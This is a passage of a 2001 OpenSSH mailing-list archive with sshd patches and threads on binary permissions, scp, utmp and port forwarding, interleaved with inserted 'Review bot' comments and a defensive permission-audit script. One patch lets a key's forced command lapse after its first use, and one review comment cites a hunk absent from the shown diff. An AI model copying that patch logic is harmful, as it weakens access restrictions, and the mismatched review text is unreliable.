+ xfree(original_command); + original_command = NULL; + } +} + + /* administrative, login(1)-like work */ void do_login(Session *s, const char *command) @@ -1288,13 +1308,8 @@ int session_shell_req(Session *s) { - /* if forced_command == NULL, the shell is execed */ - char *shell = forced_command; packet_done(); - if (s->ttyfd == -1) - do_exec_no_pty(s, shell); - else - do_exec_pty(s, shell); + do_exec(s, NULL); return 1; } 
@@ -1304,17 +1319,7 @@ u_int len; char *command = packet_get_string(&len); packet_done(); - if (forced_command) { - original_command = command; - command = forced_command; - debug("Forced command '%.500s'", forced_command); - } - if (s->ttyfd == -1) - do_exec_no_pty(s, command); - else - do_exec_pty(s, command); - if (forced_command == NULL) - xfree(command); + do_exec(s, command); return 1; } -------------- next part -------------- --- auth.c.O2 Mon Jun 18 14:21:06 2001 +++ auth.c Mon Jun 18 14:24:33 2001 @@ -47,6 +47,9 @@ #include "buffer.h" #include "bufaux.h" +/* set when password has expired */ +int forced_passwd_change = 0; + /* import */ extern ServerOptions options; @@ -81,13 +84,23 @@ int days = time(NULL) / 86400; /* Check account expiry */ - if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) + if ((spw->sp_expire >= 0) && (days > spw->sp_expire)) { + log("User %.100s not allowed because account expired", + pw->pw_name); return 0; + } /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && - (days > (spw->sp_lstchg + spw->sp_max))) - return 0; + (days > (spw->sp_lstchg + spw->sp_max))) { + if ((pw->pw_uid == 0)) { + log("User %.100s not allowed because password expired", + pw->pw_name); + return 0; + } + + forced_passwd_change = 1; + } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ @@ -177,7 +190,7 @@ } /* Remove trailing newline */ *--p = '\0'; - log("Login restricted for %s: %.100s", pw->pw_name, loginmsg); + log("Login restricted for %.100s: %.100s", pw->pw_name, loginmsg); } return 0; } --- auth.h.O Tue Jun 5 15:25:06 2001 +++ auth.h Mon Jun 18 14:28:04 2001 @@ -35,6 +35,9 @@ #include #endif +/* set when password has expired */ +extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; --- session.c.O2 Mon Jun 18 14:21:15 2001 +++ session.c Mon Jun 18 14:39:36 2001 
@@ -603,6 +603,34 @@ debug("Forced command '%.900s'", command); } + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (command != NULL) + xfree(command); + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = xstrdup(PASSWD_PATH); + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = xstrdup("/bin/sh -c 'echo Permission denied >&2; exit 1'"); + } + log(msg, user); + packet_send_debug(msg, user); + } + if (s->ttyfd != -1) do_exec_pty(s, command); else --- configure.in.O Sun Jun 10 12:24:52 2001 +++ configure.in Mon Jun 18 14:27:23 2001 @@ -1304,6 +1304,10 @@ AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi +AC_PATH_PROG(PASSWD_PATH, passwd) +AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` --- acconfig.h.O Tue May 8 15:33:06 2001 +++ acconfig.h Mon Jun 18 14:30:16 2001 @@ -211,6 +211,9 @@ /* Define if rsh is found in your path */ #undef RSH_PATH +/* Define if passwd is found in your path */ +#undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From raye at meow.raye.com Tue Jun 19 09:52:03 2001 
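Review bot: in the new do_exec() (session.c hunk @@ -504,6 +495,35 @@), `forced_command = NULL;` followed by `xfree(command)` (which at that point aliases forced_command) consumes the forced command on its first use, whereas the code this replaces in session_exec_req left forced_command intact and only freed the client's own string (`if (forced_command == NULL) xfree(command);`). Because do_exec() is now the common path for both session_shell_req and session_exec_req, a later shell or exec request arriving on the same connection runs without the restriction the key option imposed; keep forced_command for the lifetime of the connection and release it when the session is torn down, or state in the comment why one-shot behaviour is wanted. The `xfree(command)` on a `const char *` also discards the qualifier and will draw a compiler warning.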
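Review bot: in the auth.c hunk @@ -81,13 +84,23 @@, `forced_passwd_change` is a file-scope flag that allowed_user() sets and nothing ever clears, so it outlives the check that set it; reset it at the start of each authentication attempt, or carry it in the Authctxt instead of a global. The expiry test only compares `days` against `sp_lstchg + sp_max`; the shadow record also carries an inactivity period (sp_inact) after which an expired account is meant to be locked rather than offered a password change, so a user past that window is still routed to passwd here. Style: `if ((pw->pw_uid == 0))` has a redundant pair of parentheses.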
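Review bot: in the session.c hunk @@ -603,6 +603,34 @@, `msg` is a plain `char *` that receives string literals and is then passed to log() and packet_send_debug() as their format argument; declare it `const char *` and keep the single `%.100s` conversion as the only format directive so the message text can never be mistaken for user input. The block also sits after the forced-command substitution shown in the hunk's context, so a key whose forced command was just selected has it silently replaced by passwd; if that is the intent, say so in the comment, otherwise test forced_passwd_change before applying the forced command. For the no-pty branch, running `/bin/sh -c 'echo Permission denied >&2; exit 1'` only to print a message could be replaced by sending the failure on the channel and closing it without an exec.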
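Review bot: in the configure.in hunk @@ -1304,6 +1304,10 @@, `AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH")` is unconditional, so on a build host where AC_PATH_PROG finds no passwd the macro expands to `""` and session.c ends up doing `xstrdup("")` and trying to execute an empty command. Guard the define the way the preceding RSH_PATH block in the context does (`if test ! -z "$PASSWD_PATH"; then ... fi`) and have session.c fall back to the "cannot be changed" path when PASSWD_PATH is undefined.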
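Review bot: in the auth.c hunk @@ -108,6 +125,8 @@, the new message "none of user's group are listed in AllowGroups" should read "none of user's groups is listed in AllowGroups"; the other added log lines in this patch use a consistent "User %.100s not allowed because ..." form, so this one is worth matching exactly since administrators will grep for it.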
From: raye at meow.raye.com (Geoff Raye)
Date: Mon, 18 Jun 2001 18:52:03 -0500
Subject: poor permissions on ssh binary
Message-ID: <200106182352.f5INq3Z16674@meow.raye.com>

I just installed portable openssh 2.9p2, but the issue I have shouldn't be unique to the portable version. I built with

% ../configure --prefix=/usr/local/encap/openssh-2.9p2 --sysconfdir=/etc --with-cflags=-O2 --with-tcp-wrappers --with-ssl-dir=/usr/local --with-md5-passwords --disable-suid-ssh

When it came time to make install, this command was executed:

/usr/local/bin/install -c -m 0711 -s ssh /usr/local/encap/openssh-2.9p2/bin/ssh

I consider it a poor choice of permissions to make ssh be 0711, and I believe that configure.in should be changed on line 1624:

SSHMODE=0755

would make more sense than

SSHMODE=0711

For that matter, I believe that the suid root binary has no compelling reason not to be world-readable, either, but I don't know whether there have been past security implications of this which would warrant keeping the file unreadable and not copyable. In any event, keeping non-suid ssh binaries 0711 is a choice which goes back to the original f-secure/commercial/tatu SSH.

Thank you for your consideration.

Geoff Raye
-- 
Geoff Raye         \ All irregularities will be handled by the forces
geoff at raye.com     \ controlling each dimension. Transuranic heavy
                   \ elements may not be used where there is life.

From GILBERT.R.LOOMIS at saic.com Wed Jun 20 00:14:17 2001
From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip)
Date: Tue, 19 Jun 2001 10:14:17 -0400
Subject: FW: poor permissions on ssh binary
Message-ID: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com>

-----Original Message-----
From: Loomis, Rip
Sent: Tuesday, 19 June, 2001 09:10
To: 'geoff at raye.com'
Subject: RE: poor permissions on ssh binary

Geoff--

You stated that you consider it "a poor choice of permissions" to install the ssh binary as mode 0711. Since it will run perfectly with even more restrictive permissions (we typically install it mode 0511 here), what is your objection to those permissions? You state that 0755 would "make more sense" than 0711...but you haven't provided a convincing argument as to what the problem is.

As a general rule when locking down a system, we change the "ugo" permissions on all security-critical executables (including all SetUID/SetGID programs) to mode 511, and although there's some additional administrative burden it has also minimized exposure to certain vulnerabilities in the past.

Here's my list of pros and cons:

Disadvantages of 0711 perms:
1. Doesn't allow non-privileged users to copy the installed binaries to other systems or locations (which could be useful to that user).

Advantages of 0711 perms:
1. Doesn't allow non-privileged users to read the installed binaries (which could be used to run strings against them to find out compiled options, etc.)
2. Doesn't allow non-privileged users to copy the installed binaries to other systems or locations (the copied binaries could then *potentially* be directly modified or trojaned--but this is highly unlikely in today's world).
3. System administrators can still copy the installed binaries to other systems or locations.

Note that I don't think that those advantages are particularly amazing, and in fact any bad guy who wants to do something evil with OpenSSH would just start with the source.
However, the binaries run just fine with the current permissions, and there's this important security concept called Least Privilege--which I'll explain in this case as "one shouldn't go around giving users or processes powers that they don't absolutely require, because one can't always predict future bugs and exposures."

The bottom line is that I can't come up with a convincing reason why the permissions should change. If you've got one, then please send it to the list and the core development team can decide what to do. Any organization that wants less restrictive permissions should feel free to install it that way...but I don't feel that the current default is broken.

-- 
Rip Loomis
Senior Systems Security Engineer, SAIC CIST
Brainbench MVP for Internet Security
http://www.brainbench.com [Transcript 1923411]

-----Original Message-----
From: Geoff Raye [mailto:raye at meow.raye.com]
Sent: Monday, 18 June, 2001 18:52
To: openssh at openssh.com
Subject: poor permissions on ssh binary

I just installed portable openssh 2.9p2, but the issue I have shouldn't be unique to the portable version. I built with

% ../configure --prefix=/usr/local/encap/openssh-2.9p2 --sysconfdir=/etc --with-cflags=-O2 --with-tcp-wrappers --with-ssl-dir=/usr/local --with-md5-passwords --disable-suid-ssh

When it came time to make install, this command was executed:

/usr/local/bin/install -c -m 0711 -s ssh /usr/local/encap/openssh-2.9p2/bin/ssh

I consider it a poor choice of permissions to make ssh be 0711, and I believe that configure.in should be changed on line 1624:

SSHMODE=0755

would make more sense than

SSHMODE=0711

For that matter, I believe that the suid root binary has no compelling reason not to be world-readable, either, but I don't know whether there have been past security implications of this which would warrant keeping the file unreadable and not copyable. In any event, keeping non-suid ssh binaries 0711 is a choice which goes back to the original f-secure/commercial/tatu SSH.

Thank you for your consideration.

Geoff Raye
-- 
Geoff Raye         \ All irregularities will be handled by the forces
geoff at raye.com     \ controlling each dimension. Transuranic heavy
                   \ elements may not be used where there is life.

From remailer at xganon.com Wed Jun 20 01:13:27 2001
From: remailer at xganon.com (Public )
Date: Tue, 19 Jun 2001 10:13:27 -0500
Subject: openssh-2.9p2: scp: usage message does not mention -o option
Message-ID:

$ scp --invalid-- somehost:somefile .
scp: invalid option -- -
usage: scp [-pqrvBC46] [-S ssh] [-P port] [-c cipher] [-i identity] f1 f2
   or: scp [options] f1 ... fn directory

The -o option is not mentioned.

From acox at ia.primustel.com Wed Jun 20 03:43:24 2001
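The 0711-versus-0755 exchange above (Geoff Raye, Rip Loomis) turns on which permission bits an installed binary grants to group and other. The audit script below is an added example, not code from the thread or from OpenSSH: it converts the mode column of ls -l into octal and lists the files under a directory that are group- or world-readable or carry a set-id bit, so an installed SSHMODE can be compared against the 0511/0711 baseline Rip describes.

```shell
#!/bin/sh
# Added example for the ssh-binary permission discussion; constructed here,
# not taken from the thread or from OpenSSH. Works with POSIX sh and avoids
# stat(1), whose flags differ between GNU and BSD systems.

# nth_char STRING N -> the N-th character (1-based) of STRING
nth_char() {
    printf '%s' "$1" | cut -c"$2"
}

# perm_to_octal MODESTRING -> 4-digit octal mode, e.g. "-rws--x--x" -> 4711
# The first character (file type) is ignored; s/S, s/S and t/T in the
# owner, group and other execute slots carry setuid, setgid and sticky.
perm_to_octal() {
    m=$1
    special=0 owner=0 group=0 other=0
    case $(nth_char "$m" 2) in r) owner=4 ;; esac
    case $(nth_char "$m" 3) in w) owner=$((owner + 2)) ;; esac
    case $(nth_char "$m" 4) in
        x) owner=$((owner + 1)) ;;
        s) owner=$((owner + 1)); special=$((special + 4)) ;;   # setuid + x
        S) special=$((special + 4)) ;;                         # setuid, no x
    esac
    case $(nth_char "$m" 5) in r) group=4 ;; esac
    case $(nth_char "$m" 6) in w) group=$((group + 2)) ;; esac
    case $(nth_char "$m" 7) in
        x) group=$((group + 1)) ;;
        s) group=$((group + 1)); special=$((special + 2)) ;;   # setgid + x
        S) special=$((special + 2)) ;;
    esac
    case $(nth_char "$m" 8) in r) other=4 ;; esac
    case $(nth_char "$m" 9) in w) other=$((other + 2)) ;; esac
    case $(nth_char "$m" 10) in
        x) other=$((other + 1)) ;;
        t) other=$((other + 1)); special=$((special + 1)) ;;   # sticky + x
        T) special=$((special + 1)) ;;
    esac
    printf '%d%d%d%d\n' "$special" "$owner" "$group" "$other"
}

# file_mode PATH -> octal mode of PATH, taken from the first ten columns of
# ls -ld (an ACL or security-context marker in column 11 is ignored)
file_mode() {
    perm_to_octal "$(ls -ld "$1" | cut -c1-10)"
}

# exec_audit DIR -> one line "MODE FLAGS PATH" for each regular file under
# DIR that is readable by group or other, or has setuid/setgid set.
# A 0711 or 0511 binary without set-id bits produces no output.
exec_audit() {
    find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
        mode=$(file_mode "$f")
        flags=""
        # A leading 0 makes the shell read the digits as octal.
        if [ $((0$mode & 040)) -ne 0 ]; then flags="${flags}group-readable "; fi
        if [ $((0$mode & 004)) -ne 0 ]; then flags="${flags}world-readable "; fi
        if [ $((0$mode & 06000)) -ne 0 ]; then flags="${flags}set-id "; fi
        if [ -n "$flags" ]; then
            printf '%s %s%s\n' "$mode" "$flags" "$f"
        fi
    done
}
```

Running `exec_audit /usr/local/encap/openssh-2.9p2/bin` against Geoff's install prefix prints nothing for a 0711 ssh and reports a 0755 one as group- and world-readable.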
From: acox at ia.primustel.com (Aran Cox)
Date: Tue, 19 Jun 2001 12:43:24 -0500
Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2
In-Reply-To: <20010619143153.B22082@folly>; from markus.friedl@informatik.uni-erlangen.de on Tue, Jun 19, 2001 at 02:31:53PM +0200
References: <20010613163006.A1374@benway.cv.telegroup.com> <20010618180510.A31297@benway.cv.telegroup.com> <20010619143153.B22082@folly>
Message-ID: <20010619124324.A2087@benway.cv.telegroup.com>

On Tue, Jun 19, 2001 at 02:31:53PM +0200, Markus Friedl wrote:
> On Mon, Jun 18, 2001 at 06:05:10PM -0500, Aran Cox wrote:
> > Well, I almost solved my problem but caused another. I downloaded today's snapshot
> > and compiled that for linux. Now no X applications make it back:
> >
> > Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server
> > Xlib: Invalid MIT-MAGIC-COOKIE-1 key
> > Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0
> >
> > If I do an xhost +localhost, everything works perfectly. But I don't really
> > want to do an xhost +localhost on my machine, and I didn't have to before.
> >
> > Any suggestions?
>
> try
> DISPLAY=localhost:10.0
> export DISPLAY
> xbiff
>
> does this work?

No, it gives the same error message.

From mmokrejs at natur.cuni.cz Wed Jun 20 05:06:04 2001
From: mmokrejs at natur.cuni.cz (Martin MOKREJŠ)
Date: Tue, 19 Jun 2001 21:06:04 +0200 (MET DST)
Subject: SSH-AFS: Re: OpenSSH + Solaris + AFS ???
In-Reply-To: <200106190955.LAA12444@ccdevli2.in2p3.fr>
Message-ID:

Hello,
if you link binaries against -ldes and -lcrypto, the resulting sshd will not work if the client uses 3des, try it! (tested on Irix 6.5, Solaris 2.6). The Blowfish cipher works even in the previous case (no surprise, the conflicting des code is not in use). Interestingly, with that sshd I couldn't log in as root, only as a user.

Working solution: Remove all occurrences of -ldes in openssh*/Makefile after the configure step. I had to edit openssh*/defines.h and kafs.h, but this I've already posted to the list (sorry, another list: see the archive of krb4 at http://www.natur.cuni.cz/cgi/wilma/krb4). On Irix I needed to include the -I/usr/athena/include at the very beginning of the command line - relates to the kafs.h problem. Otherwise no problems. Tested on openssh-2.9p2.

The source tree with my binaries for Irix and Solaris you can get from http://nmrindy.natur.cuni.cz/afs/natur.cuni.cz/src/kth-krb_and_ssh/

-- 
Martin Mokrejs - PGP5.0i key is at http://www.natur.cuni.cz/~mmokrejs
Faculty of Science, The Charles University

From dveeravalli at telica.com Wed Jun 20 10:22:18 2001
From: dveeravalli at telica.com (Deepa Nemmili Veeravalli)
Date: Tue, 19 Jun 2001 20:22:18 -0400
Subject: behaviour of sshd in debug mode
Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDCB@wench>

Hi,

I tried searching the openssh docs and the archives but could not get much info on this problem I am facing with openssh.

When I run sshd on the remote machine (OpenSSH_2.9p1) in debug mode and try to log in from the local host (OpenSSH_2.3.0), I get into the remote host with public key authentication. But if I run sshd without debug mode, I am prompted for password authentication and even though I give the correct password I am refused connection.

Pls can someone tell me if I am missing something...

Thanks for any help,
Deepa.

From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 14:56:21 2001
From: J.S.Peatfield at damtp.cam.ac.uk (J.S.Peatfield at damtp.cam.ac.uk)
Date: Wed, 20 Jun 2001 05:56:21 +0100 (BST)
Subject: openssh-2.9p1 scp to ssh-2.4 fails
Message-ID: <200106200456.FAA10899.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk>

Am I missing something obvious or does the scp in openssh not interoperate with the scp in ssh-2.4? I don't have any ssh-2.4 systems but a user here trying to fetch a file from a site which uses it (and doesn't have scp1) gets:

scp -o 'protocol 2' -o 'loglevel debug3' -v herrada at eurus2.us.es:tf19.dat

From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 15:09:33 2001
From: J.S.Peatfield at damtp.cam.ac.uk (J.S.Peatfield at damtp.cam.ac.uk)
Date: Wed, 20 Jun 2001 06:09:33 +0100 (BST)
Subject: openssh-2.9p1 scp to ssh-2.4 fails
Message-ID: <200106200509.GAA21071.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk>

Damn finger trouble... (must learn to cut/paste...)

Am I missing something obvious or does the scp in openssh not interoperate with the scp in ssh-2.4? I don't have any ssh-2.4 systems but a user here trying to fetch a file from a site which uses it (and doesn't have scp1) gets:

$ scp -o 'protocol 2' -v foobar at somesite.com:tf19.dat .
Executing: program /usr/bin/ssh host somesite.com, user foobar, command scp -v -f tf19.dat
foobar at somesite.com's password:
scp: warning: Executing scp1 compatibility.
scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1 is in your PATH).

I assume that the scp warning is coming from the far end. Turning up debugging shows that ssh protocol 2 is correctly being used, but for some reason the remote scp tries to run scp1 (which isn't there). Does ssh-2.4 use a different form of scp to that used by ssh1 and openssh?

Is there an obvious fix (other than trying to get the remote site to update to openssh)?

Is the scp protocol used in ssh-2.4 documented? Could we add support for it in openssh?

-- Jon

From mouring at etoh.eviladmin.org Wed Jun 20 15:06:11 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Wed, 20 Jun 2001 00:06:11 -0500 (CDT)
Subject: openssh-2.9p1 scp to ssh-2.4 fails
In-Reply-To: <200106200509.GAA21071.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk>
Message-ID:

He must use sftp. OpenSSH scp does not support the sftp protocol, and SSH Corp's v2 server ONLY implements sftp, not traditional rcp-like scp.

- Ben

On Wed, 20 Jun 2001 J.S.Peatfield at damtp.cam.ac.uk wrote:

> Damn finger trouble... (must learn to cut/paste...)
>
> Am I missing something obvious or does the scp in openssh not
> interoperate with the scp in ssh-2.4? I don't have any ssh-2.4
> systems but a user here trying to fetch a file from a site which uses
> it (and doesn't have scp1) gets:
>
> $ scp -o 'protocol 2' -v foobar at somesite.com:tf19.dat .
> Executing: program /usr/bin/ssh host somesite.com, user foobar, command scp -v -f tf19.dat
> foobar at somesite.com's password:
> scp: warning: Executing scp1 compatibility.
> scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1
> is in your PATH).
>
> I assume that the scp warning is coming from the far end. Turning up
> debugging shows that ssh protocol 2 is correctly being used, but for
> some reason the remote scp tries to run scp1 (which isn't there).
> Does ssh-2.4 use a different form of scp to that used by ssh1 and
> openssh?
>
> Is there an obvious fix (other than trying to get the remote site to
> update to openssh)?
>
> Is the scp protocol used in ssh-2.4 documented? Could we add support
> for it in openssh?
>
> -- Jon
>

From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 15:51:06 2001
From: J.S.Peatfield at damtp.cam.ac.uk (J.S.Peatfield at damtp.cam.ac.uk)
Date: Wed, 20 Jun 2001 06:51:06 +0100
Subject: openssh-2.9p1 scp to ssh-2.4 fails
Message-ID: <200106200551.GAA13693.marilyn.amtp.cam.ac.uk@damtp.cam.ac.uk>

Thanks, I've asked him to try sftp (I wasn't sure if that would work or not), since I don't have a login on a system running ssh-2.4 I can't test it myself...

From Lutz.Jaenicke at aet.TU-Cottbus.DE Wed Jun 20 18:20:51 2001
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke)
Date: Wed, 20 Jun 2001 10:20:51 +0200
Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?]
Message-ID: <20010620102051.A1595@ws01.aet.tu-cottbus.de>

Hi!

I am resending the following message about problems with utmp handling.
* In the meantime I had some requests in private mail from people asking whether I have new information.
* The problem is still persistent in 2.9p2.
* My own new investigations show that the problem only appears with protocol 2, not with protocol 1; I therefore only started to note it when protocol 2 became the default as of OpenSSH 2.9.
  - To reproduce: build a connection with protocol 1/2 and then kill the client with -TERM. For protocol 1, the entry in utmp on the server will be removed, for protocol 2 it will not be removed.

From sshd -d I see that session_pty_cleanup() is not being called. As far as I understood the code in session.c:session_pty_req()

	/*
	 * Add a cleanup function to clear the utmp entry and record logout
	 * time in case we call fatal() (e.g., the connection gets closed).
	 */
	fatal_add_cleanup(session_pty_cleanup, (void *)s);

should make sure that the utmp entry is cleared, but it obviously doesn't work as I expected from that statement.

Best regards,
	Lutz

----- Forwarded message from Lutz Jaenicke -----

Delivered-To: openssh-unix-dev-list-93873 at shitei.mindrot.org
Date: Thu, 10 May 2001 10:11:38 +0200
From: Lutz Jaenicke
To: openssh-unix-dev at mindrot.org
Subject: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?
Mail-Followup-To: openssh-unix-dev at mindrot.org
User-Agent: Mutt/1.2.5i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
Precedence: bulk

Hi!

I have updated to OpenSSH 2.9p1 on HP-UX 10.20. Since this update, I seem to have problems with utmp/wtmp handling, in that entries are not removed as expected.

ws01 36: w
 10:06am  up 76 days, 12:52,  12 users,  load average: 0.17, 0.25, 0.20
User     tty       login@  idle    JCPU   PCPU  what
...
root     pts/8     5:28pm  159:41                -
...
ws01 37: ps -ef | grep pts/8
(nothing)
ws01 39: lsof /dev/pts/8
(nothing)

From my observations this seems to happen when slogin is not finished with "exit", but the ssh-client is killed (e.g. because it was in a terminal window and I log off the window manager).

Can anybody verify this behaviour? (Fixes?) I don't remember having seen this with 2.5.2p2...

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

----- End forwarded message -----

-- 
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From Jarno.Huuskonen at uku.fi Wed Jun 20 20:32:41 2001
From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen)
Date: Wed, 20 Jun 2001 13:32:41 +0300
Subject: openssh and port forwarding as root
Message-ID: <20010620133241.A97346@messi.uku.fi>

Hi,

Openssh sshd opens the socket that forwards users' requested port forwards as root, so the connection seems to come from root. Is it enough to open the socket as the normal user so the connection would appear to come from that user? (On Linux this seems to work, but what about other OS's?)

I tested this briefly by wrapping the channel_connect_to(target, target_port); (in serverloop.c:server_request_direct_tcpip) with temporarily_use_uid and restore_uid calls and it seems to work (I used hardcoded values for temporarily_use_uid).

Is it possible to acquire the username/uid/gid info in server_request_direct_tcpip (and where the socket is opened with protocol 1) to add temporarily_use_uid / restore_uid calls?

-Jarno

-- 
Jarno Huuskonen - System Administrator   |  Jarno.Huuskonen at uku.fi
University of Kuopio - Computer Center   |  Work:   +358 17 162822
PO BOX 1627, 70211 Kuopio, Finland       |  Mobile: +358 40 5388169

From mouring at etoh.eviladmin.org Wed Jun 20 22:34:12 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Wed, 20 Jun 2001 07:34:12 -0500 (CDT)
Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?]
In-Reply-To: <20010620102051.A1595@ws01.aet.tu-cottbus.de>
Message-ID:

At this point I can only verify that it's true for OpenBSD, but it is not true for Linux. I have a sneaking feeling that if I were to try it under Solaris it would mimic Linux (I'll try it when I get to work). My only reason for this belief is I think PAM may actually handle utmp/wtmp clean ups if the application does not.

- Ben

On Wed, 20 Jun 2001, Lutz Jaenicke wrote:

> Hi!
>
> I am resending the following message about problems with utmp handling.
> * In the meantime I had some requests in private mail from people asking
>   whether I have new information.
> * The problem is still persistent in 2.9p2.
> * My own new investigations show that the problem only appears with
>   protocol 2, not with protocol 1; I therefore only started to note it
>   when protocol 2 became the default as of OpenSSH 2.9.
>   - To reproduce: build a connection with protocol 1/2 and then kill the client
>     with -TERM. For protocol 1, the entry in utmp on the server will be
>     removed, for protocol 2 it will not be removed.
>
> From sshd -d I see that session_pty_cleanup() is not being called.
> As far as I understood the code in session.c:session_pty_req()
>         /*
>          * Add a cleanup function to clear the utmp entry and record logout
>          * time in case we call fatal() (e.g., the connection gets closed).
>          */
>         fatal_add_cleanup(session_pty_cleanup, (void *)s);
> should make sure that the utmp entry is cleared, but it obviously
> doesn't work as I expected from that statement.
>
> Best regards,
>         Lutz
>
> ----- Forwarded message from Lutz Jaenicke -----
>
> Delivered-To: openssh-unix-dev-list-93873 at shitei.mindrot.org
> Date: Thu, 10 May 2001 10:11:38 +0200
> From: Lutz Jaenicke
> To: openssh-unix-dev at mindrot.org
> Subject: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?
> Mail-Followup-To: openssh-unix-dev at mindrot.org
> User-Agent: Mutt/1.2.5i
> Organization: BTU Cottbus, Allgemeine Elektrotechnik
> Precedence: bulk
>
> Hi!
>
> I have updated to OpenSSH 2.9p1 on HP-UX 10.20.
> Since this update, I seem to have problems with utmp/wtmp handling,
> in that entries are not removed as expected.
> ws01 36: w
>  10:06am  up 76 days, 12:52,  12 users,  load average: 0.17, 0.25, 0.20
> User     tty       login@  idle    JCPU   PCPU  what
> ...
> root     pts/8     5:28pm  159:41                -
> ...
> ws01 37: ps -ef | grep pts/8
> (nothing)
> ws01 39: lsof /dev/pts/8
> (nothing)
>
> From my observations this seems to happen when slogin is not finished with
> "exit", but the ssh-client is killed (e.g. because it was in a terminal window
> and I log off the window manager).
>
> Can anybody verify this behaviour? (Fixes?) I don't remember having seen
> this with 2.5.2p2...
>
> Best regards,
>         Lutz
> -- 
> Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
> BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
> Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
> Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153
>
> ----- End forwarded message -----
>
> -- 
> Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
> BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
> Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
> Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153
>

From jason at dour.org Wed Jun 20 23:12:08 2001
From: jason at dour.org (Jason A . Dour) Date: Wed, 20 Jun 2001 09:12:08 -0400 Subject: SFTP Logging Redux. Message-ID: <20010620091208.A18950@dour.org> Sorry to repost, but I finally have the code on a machine that has diff -u, and I've updated it for 2.9p2. Attached is the unified diff to add logging of SFTP activity to auth.info. If there is a more proper way to contrib patches, please let me know. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- --- sftp-server.c.orig Tue Jun 19 16:32:45 2001 +++ sftp-server.c Wed Jun 20 08:54:03 2001 @@ -52,8 +52,14 @@ /* Version of client */ int version; -/* portable attibutes, etc. */ +/* User information. */ +#define CUNAME cuname ? cuname : "UNKNOWN" +struct passwd *upw; +uid_t cuid; +pid_t ppid; +char *cuname; +/* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { @@ -115,6 +121,28 @@ return flags; } +void +sflags_from_portable(char *psflags, int pflags) +{ + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; +} + Attrib * get_attrib(void) { @@ -370,6 +398,7 @@ version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); @@ -382,7 